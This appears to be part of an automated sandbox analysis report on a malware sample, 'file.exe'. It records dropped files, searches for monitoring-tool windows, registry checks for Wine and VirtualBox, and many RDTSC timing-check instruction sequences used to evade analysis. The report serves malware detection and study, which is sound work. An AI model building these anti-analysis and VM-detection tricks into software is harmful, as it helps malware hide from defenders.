Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Bunifu_UI_v1.5.3.dll

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A60FA second address: 9A60FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 991A1C second address: 991A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5143 second address: 9A5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FFAA4B0AF20h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FFAA4B0AF16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5166 second address: 9A516A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A529E second address: 9A52A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAA4B0AF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A52A8 second address: 9A52B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A53E9 second address: 9A53F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FFAA4B0AF16h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A53F9 second address: 9A53FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5534 second address: 9A554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A554A second address: 9A5565 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAA4EF80C6h 0x00000008 jmp 00007FFAA4EF80D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5565 second address: 9A556A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59B1 second address: 9A59D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFAA4EF80C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59D0 second address: 9A59D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59D6 second address: 9A59DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A59DC second address: 9A59E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8981 second address: 9A8986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A89D0 second address: 9A89D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A89D6 second address: 9A8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FFAA4EF80C8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 pushad 0x00000024 cmc 0x00000025 mov dx, E1B2h 0x00000029 popad 0x0000002a jnl 00007FFAA4EF80CCh 0x00000030 call 00007FFAA4EF80C9h 0x00000035 pushad 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007FFAA4EF80CFh 0x0000003e popad 0x0000003f pushad 0x00000040 jmp 00007FFAA4EF80CFh 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A44 second address: 9A8A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A51 second address: 9A8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A55 second address: 9A8A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8A59 second address: 9A8A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8B9B second address: 9A8BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8BB7 second address: 9A8BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8BBB second address: 9A8C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FFAA4B0AF1Bh 0x0000000d nop 0x0000000e je 00007FFAA4B0AF1Ch 0x00000014 mov ecx, dword ptr [ebp+122D3577h] 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D3613h] 0x00000022 call 00007FFAA4B0AF19h 0x00000027 pushad 0x00000028 jmp 00007FFAA4B0AF1Eh 0x0000002d push ecx 0x0000002e jmp 00007FFAA4B0AF1Ch 0x00000033 pop ecx 0x00000034 popad 0x00000035 push eax 0x00000036 push edi 0x00000037 push edx 0x00000038 jmp 00007FFAA4B0AF25h 0x0000003d pop edx 0x0000003e pop edi 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jl 00007FFAA4B0AF2Dh 0x00000049 pushad 0x0000004a jmp 00007FFAA4B0AF1Fh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8C40 second address: 9A8CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FFAA4EF80CBh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FFAA4EF80D3h 0x00000016 push edx 0x00000017 jbe 00007FFAA4EF80C6h 0x0000001d pop edx 0x0000001e popad 0x0000001f pop eax 0x00000020 stc 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D198Dh], esi 0x00000029 push 00000000h 0x0000002b add dword ptr [ebp+122D25EBh], ebx 0x00000031 push 00000003h 0x00000033 or cx, 0988h 0x00000038 push 58671ECCh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFAA4EF80CDh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A8DB7 second address: 9A8DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BA5DA second address: 9BA5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA862 second address: 9CA87C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAA4B0AF16h 0x00000008 jg 00007FFAA4B0AF16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FFAA4B0AF1Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C89BD second address: 9C89C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B0B second address: 9C8B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FFAA4B0AF16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B17 second address: 9C8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B1B second address: 9C8B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B21 second address: 9C8B26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B26 second address: 9C8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8C88 second address: 9C8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAA4EF80C6h 0x0000000a jmp 00007FFAA4EF80D2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FFAA4EF80C6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FFAA4EF80D9h 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 je 00007FFAA4EF80CCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8CD4 second address: 9C8CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8E1B second address: 9C8E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8E21 second address: 9C8E2B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8FBB second address: 9C8FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C910F second address: 9C9121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C9121 second address: 9C9151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D2h 0x00000007 ja 00007FFAA4EF80CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007FFAA4EF80C8h 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C097B second address: 9C0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0981 second address: 9C0987 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0987 second address: 9C0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FFAA4B0AF16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED66 second address: 9CED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED6D second address: 9CED73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CED73 second address: 9CED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF2CE second address: 9CF2E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4B0AF1Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F39 second address: 9D3F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F3F second address: 9D3F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F45 second address: 9D3F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F49 second address: 9D3F5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FFAA4B0AF26h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F5B second address: 9D3F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D40BE second address: 9D40C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D40C6 second address: 9D40D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FFAA4EF80C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D423C second address: 9D4242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4242 second address: 9D4246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4246 second address: 9D424A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D438C second address: 9D43A8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAA4EF80C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FFAA4EF80C6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47D5 second address: 9D47F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Fh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47F0 second address: 9D47F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D47F6 second address: 9D480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FFAA4B0AF18h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D480A second address: 9D4810 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7E7E second address: 9D7E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAA4B0AF16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7E89 second address: 9D7E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F75 second address: 9D7F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F7B second address: 9D7F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7F7F second address: 9D7FAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAA4B0AF1Bh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFAA4B0AF25h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7FAF second address: 9D802C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FFAA4EF80CFh 0x0000000f jl 00007FFAA4EF80CCh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a js 00007FFAA4EF80CCh 0x00000020 pop eax 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007FFAA4EF80C8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b movzx esi, cx 0x0000003e add di, BBC1h 0x00000043 push 2CB38B3Ah 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FFAA4EF80D3h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D802C second address: 9D8031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8413 second address: 9D841D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8CD4 second address: 9D8CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D8F55 second address: 9D8F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9038 second address: 9D903D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D92DA second address: 9D92DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D92DE second address: 9D92F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAA4B0AF22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D985B second address: 9D985F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9F52 second address: 9D9F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DAA1F second address: 9DAA25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D9F56 second address: 9D9F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC786 second address: 9DC7E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+122D293Ah] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+12453B53h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FFAA4EF80C8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D2C32h], edi 0x00000039 je 00007FFAA4EF80CCh 0x0000003f add edi, dword ptr [ebp+122D3463h] 0x00000045 xchg eax, ebx 0x00000046 push ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007FFAA4EF80C6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DD203 second address: 9DD207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DD207 second address: 9DD215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEB8C second address: 9DEBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAA4B0AF1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DEBB4 second address: 9DEBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2654 second address: 9E2690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007FFAA4B0AF1Ch 0x0000000f nop 0x00000010 or edi, dword ptr [ebp+122D35FBh] 0x00000016 push 00000000h 0x00000018 jl 00007FFAA4B0AF18h 0x0000001e mov edi, eax 0x00000020 push 00000000h 0x00000022 movsx edi, ax 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FFAA4B0AF1Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2690 second address: 9E2696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
